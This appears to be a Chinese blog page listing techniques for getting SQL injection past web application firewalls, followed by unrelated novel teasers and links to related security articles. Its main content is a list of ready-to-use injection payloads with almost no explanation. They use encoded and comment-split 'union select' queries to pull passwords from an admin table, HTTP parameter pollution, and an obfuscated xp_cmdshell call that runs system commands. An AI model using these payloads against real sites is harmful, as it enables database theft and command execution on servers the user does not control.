[SQL注入]一些繞過WAF的技術(shù)

original payload: 

?id=1 union select pass from admin limit 1

encode pyaload:

id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31 

original payload: ?id=1 union select pass from admin limit 1

encode pyaload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1

?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28admin%29%29

?id=1&id=1//And//1=2//Union//Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,version%28%29%29,3

?id=1 union select 1&id=pass from admin 

Change GET to POST, POST to GET …

GET /id=1 union select 1,2,3,4 

POST id=1 union select 1,2,3,4

?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘)

?id=1.union%0aselect@1,2 ,!3,4 

Use the comment statement to bypass(使用注釋符進(jìn)行繞過)

UNION /**/Select/**/user,pwd,from tbluser

• 人面猴

  序言：七十年代末钢坦，一起剝皮案震驚了整個濱河市，隨后出現(xiàn)的幾起案子啥酱，更是在濱河造成了極大的恐慌爹凹，老刑警劉巖，帶你破解...

  沈念sama閱讀 218,122評論 6贊 505
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件镶殷，死亡現(xiàn)場離奇詭異禾酱，居然都是意外死亡，警方通過查閱死者的電腦和手機(jī)绘趋，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 93,070評論 3贊 395
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門颤陶，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人陷遮，你說我怎么就攤上這事滓走。” “怎么了帽馋？”我有些...

  開封第一講書人閱讀 164,491評論 0贊 354
• 道士緝兇錄：失蹤的賣姜人

  文/不壞的土叔 我叫張陵搅方，是天一觀的道長。 經(jīng)常有香客問我绽族，道長姨涡，這世上最難降的妖魔是什么？ 我笑而不...

  開封第一講書人閱讀 58,636評論 1贊 293
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任吧慢，我火速辦了婚禮涛漂，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘检诗。我一直安慰自己怖喻，他們只是感情好，可當(dāng)我...

  茶點故事閱讀 67,676評論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來的

  文/花漫 我一把揭開白布岁诉。 她就那樣靜靜地躺著锚沸，像睡著了一般。 火紅的嫁衣襯著肌膚如雪涕癣。 梳的紋絲不亂的頭發(fā)上哗蜈，一...

  開封第一講書人閱讀 51,541評論 1贊 305
• 城市分裂傳說

  那天前标，我揣著相機(jī)與錄音，去河邊找鬼距潘。 笑死炼列，一個胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的音比。 我是一名探鬼主播俭尖，決...

  沈念sama閱讀 40,292評論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼洞翩！你這毒婦竟也來了稽犁？” 一聲冷哼從身側(cè)響起，我...

  開封第一講書人閱讀 39,211評論 0贊 276
• 萬榮殺人案實錄

  序言：老撾萬榮一對情侶失蹤骚亿，失蹤者是張志新（化名）和其女友劉穎已亥，沒想到半個月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體来屠，經(jīng)...

  沈念sama閱讀 45,655評論 1贊 314
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡虑椎，尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點故事閱讀 37,846評論 3贊 336
• ?白月光啟示錄

  正文 我和宋清朗相戀三年，在試婚紗的時候發(fā)現(xiàn)自己被綠了俱笛。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片捆姜。...

  茶點故事閱讀 39,965評論 1贊 348
• 活死人

  序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖迎膜，靈堂內(nèi)的尸體忽然破棺而出娇未，到底是詐尸還是另有隱情，我是刑警寧澤星虹，帶...

  沈念sama閱讀 35,684評論 5贊 347
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布零抬，位于F島的核電站，受9級特大地震影響宽涌，放射性物質(zhì)發(fā)生泄漏平夜。R本人自食惡果不足惜，卻給世界環(huán)境...

  茶點故事閱讀 41,295評論 3贊 329
• 男人毒藥：我在死后第九天來索命

  文/蒙蒙 一卸亮、第九天 我趴在偏房一處隱蔽的房頂上張望忽妒。 院中可真熱鬧，春花似錦兼贸、人聲如沸段直。這莊子的主人今日做“春日...

  開封第一講書人閱讀 31,894評論 0贊 22
• 一樁弒父案溶诞，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽鸯檬。三九已至，卻和暖如春螺垢，著一層夾襖步出監(jiān)牢的瞬間喧务，已是汗流浹背赖歌。 一陣腳步聲響...

  開封第一講書人閱讀 33,012評論 1贊 269
• 情欲美人皮

  我被黑心中介騙來泰國打工， 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留功茴，地道東北人庐冯。 一個月前我還...

  沈念sama閱讀 48,126評論 3贊 370
• 代替公主和親

  正文 我出身青樓，卻偏偏與公主長得像坎穿，于是被迫代替她去往敵國和親展父。 傳聞我的和親對象是個殘疾皇子，可洞房花燭夜當(dāng)晚...

  茶點故事閱讀 44,914評論 2贊 355

推薦閱讀更多精彩內(nèi)容

• sqlmap手冊

  sqlmap用戶手冊 說明：本文為轉(zhuǎn)載玲昧，對原文中一些明顯的拼寫錯誤進(jìn)行修正栖茉，并標(biāo)注對自己有用的信息。 ======...

  wind_飄閱讀 2,048評論 0贊 5
• SQLMap用戶手冊【超詳細(xì)】

  http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...

  xuningbo閱讀 10,312評論 2贊 22
• 減少 WAF 漏報的 8 種方法 衡载！

  近十年來搔耕，WAF 已經(jīng)逐漸發(fā)展成熟隙袁，被軟件行業(yè)接受并成為無數(shù)企業(yè)保護(hù)應(yīng)用的不二選擇。很多大型企業(yè)甚至相繼親自設(shè)計或...

  OneAPM閱讀 991評論 0贊 1
• From：黑白之道

  一套實用的滲透測試崗位面試題弃榨，你會嗎菩收？ 1.拿到一個待檢測的站，你覺得應(yīng)該先做什么鲸睛？ 收集信息 whois娜饵、網(wǎng)站源...

  g0閱讀 4,833評論 0贊 9
• 繞過waf方法

  一、各種編碼繞過 id=1 union select pass from admin limit 1 id=1%2...

  carsonsoding閱讀 2,776評論 0贊 3